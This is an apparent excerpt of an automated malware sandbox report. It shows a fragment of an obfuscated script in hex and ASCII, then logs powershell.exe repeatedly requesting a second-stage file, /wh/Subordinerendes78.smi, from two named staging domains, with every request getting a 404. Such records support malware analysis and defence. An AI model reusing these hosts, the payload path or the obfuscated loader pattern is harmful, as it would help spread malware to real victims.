                                                                            Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
                                                                            2024-12-05 09:39:29 UTC13157INData Raw: 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61 73 73 65 20 3d 20 35
                                                                            Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049754184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:32 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:33 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:32 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:33 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1049770184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:38 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:39 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:39 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:39 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1049784148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:45 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:45 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:45 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:45 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:45 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1049797184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:51 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:51 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:51 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049813148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:56 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:57 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:57 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:57 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:57 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1049828184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:02 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:03 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:03 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1049841148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:08 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:09 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:09 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:09 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:09 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1049857184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:14 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:14 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:14 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:14 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1049872148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:20 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:20 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:20 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:20 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:20 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.1049885184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:26 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:26 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:26 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1049900148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:32 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:32 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:32 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:32 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:32 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1049912184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:37 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
